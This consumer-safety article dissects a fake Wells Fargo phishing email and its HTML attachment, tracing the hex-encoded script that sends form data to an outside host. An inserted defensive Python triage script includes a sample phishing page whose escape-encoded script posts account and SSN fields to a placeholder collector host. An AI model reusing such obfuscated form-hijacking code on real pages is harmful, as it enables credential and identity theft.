Anatomy of a Phish

One of our visitors at TheDailyScam.com recently forwarded an email to us that appeared to be from Wells Fargo bank.  However, the sender felt that the email was very suspicious.  The email came with an attached file named “Case ID-40431.html.”  The email and attached html file were a very clever and extremely dangerous phishing scam.  A phishing scam is a scam in which a fake website has been set up to look like the real website of a financial institution or some other service, such as an Apple account. The scammer hopes to trick the email recipient into entering very personal information such as bank account or Apple ID login information.

In this article, we’ll take this particular scam apart and expose it in layers, starting with the simplest parts and ending with the more complex ones.  Our hope is that everyone reading this article will gain some insight into these types of scams and avoid becoming a victim themselves.

Let’s start with the email that arrived “from Wells Fargo”:

[Image 1: the Wells Fargo phishing email]

The woman who received this email does have a Wells Fargo bank account but was suspicious because the sender’s email address contained conflicting information. Though the sender is identified as “Wells Fargo,” the email came from a domain named “surveillancesystem.com.” And what’s up with that replyto@yahoo.com? It also made our recipient suspicious.  If you enter “surveillancesystem.com” into Google, you’ll learn that Google can find no such domain name (not to be confused with surveillancesystemS.com). Even if the domain surveillancesystem.com DID exist, it has nothing to do with Wells Fargo Bank!

The email asked the recipient to download the attached file “Case ID-40431.html.” Any file ending in html or htm is a web document. This means that it will engage your web browser to carry out whatever instructions are written into the file, a very risky thing to do in these circumstances. We first inspected this file using an html editor. Buried in the many lines of code in this file we found several suspicious lines, including two JavaScript blocks and a link to a URL shortening service. (JavaScript is a computer language that is used to create interactive effects on web pages.) (To learn what “shortened links” are and the inherent risks of clicking them, visit our article on the risks of shortened URLs.)

We’re reminded of the saying “curiosity killed the cat.”  We certainly didn’t want to be that cat, so we opened a web browser first and turned off JavaScript in that browser.  In fact, we severely limited anything that the browser could do.  Then we opened the html file with that limited browser and this is what we saw…

[Image 2: the fake Wells Fargo page rendered from the attachment]

What we found was a very long web page filled with more than a hundred legitimate links to Wells Fargo bank.  However, in the bottom third of the web page was a request to provide the information supposedly needed to complete the “verification process” and lift the restriction on our “restricted” bank account.  This is what the scammers wanted from us…

[Images 3, 4 and 5: the data-entry forms on the fake page]

Can you imagine providing this information to thieves?!  You can pretty well kiss your dollars goodbye, and lots more, like your identity!   Of course we wondered where this information was going to be sent, so we explored the html code and found the following unusual JavaScript in the code for the attached file:

[Image 6: the hex-encoded JavaScript found in the attachment]

What makes this a bit unusual is that someone took the effort to write this in hexadecimal code instead of plain readable characters (called ASCII characters), as if they wanted to hide the intention of this script.  We copied the hexadecimal code and pasted it into an online decoder and learned something very important and revealing. [Decoder: http://meyerweb.com/eric/tools/dencoder/]

[Image 7: the decoded JavaScript]

The decoded information tells us that once someone has entered all their personal data into the file’s various forms and clicked continue, his or her information will be submitted to a website called “geryhoops.altervisita.org.”  Sound like Wells Fargo to you yet?  And it gets worse.  We asked the Zulu URL Risk Analyzer (http://zulu.zscaler.com/) to look at this site and Zulu told us that the site is “Suspicious” and hosted in Germany.  Zulu also flagged several JavaScript files as suspicious.  We were glad to have turned off JavaScript! (The Zulu URL Risk Analyzer is one of the best tools we have found for determining whether a link is malicious or benign.  Though it is good, it isn’t perfect.)
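The inspection steps above (listing the scripts and links in the attachment, decoding the hex-encoded text, and checking where the form really submits) can be automated for safe, offline triage without ever opening the file in a browser. The following Python script is an added example, not code from the article or from the attachment; it runs on a constructed HTML sample with placeholder hostnames (collector.example.net and bit.ly/PLACEHOLDER stand in for the real ones) and assumes the expected bank domain is wellsfargo.com.

```python
import re
import urllib.parse
from html.parser import HTMLParser

# Constructed sample modelled on the attachment described above (not the real
# file): genuine bank links, a data-entry form, a shortened link, and a script
# whose real submission target is hidden behind %XX escapes.
SAMPLE_HTML = """<html><body>
<a href="https://www.wellsfargo.com/help">Help</a>
<a href="https://www.wellsfargo.com/privacy">Privacy</a>
<form id="verify" action="#" method="post">
  <input name="account"><input name="ssn"><button>Continue</button>
</form>
<script>
document.write(unescape('%3Cform%20action%3D%22http%3A%2F%2Fcollector%2Eexample%2Enet%2Fpost%2Ephp%22%3E'));
</script>
<a href="http://bit.ly/PLACEHOLDER">Verify now</a>
</body></html>"""

HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)

class _Collector(HTMLParser):
    """Gather script bodies and href/action/src values from an HTML file."""
    def __init__(self):
        super().__init__()
        self.scripts, self.refs, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        self.refs += [v for k, v in attrs if k in ("href", "action", "src") and v]
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def decode_hidden(text):
    # Turn backslash-x and percent escapes back into characters so hidden URLs show up.
    text = re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), text)
    return urllib.parse.unquote(text)

def triage(html, expected_host="wellsfargo.com"):
    """Return every host the document references that is not the expected bank."""
    parser = _Collector()
    parser.feed(html)
    corpus = decode_hidden("\n".join(parser.refs + parser.scripts))
    hosts = {h.lower() for h in HOST.findall(corpus)}
    return sorted(h for h in hosts
                  if h != expected_host and not h.endswith("." + expected_host))
```

A plain text search of the sample for the collector hostname finds nothing; only after decoding does the real submission target appear alongside the URL-shortener link.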

[Image 8: Zulu URL Risk Analyzer score for the altervista site]

We entered the domain “altervista.org” into a Google search field to see what Google might tell us, and we weren’t the least bit surprised to see many Google results referring to this domain as a known phishing site.

[Image 9: Google search results for altervista]

Clean-MX.com even had a long list of identified phishing attacks coming from various subdomains of the website Altervista.org.  (The subdomain is the name that appears in front of “altervista.org,” separated from it by a period.)

[Image 10: Clean-MX list of phishing sites hosted on altervista.org subdomains]

Like we said at the beginning of this article… this was a very, very dangerous phishing email.  This kind of phishing trick can cost someone everything he or she has in bank accounts, and can lead to identity theft and a ruined credit history.

Just delete.  Safe surfing!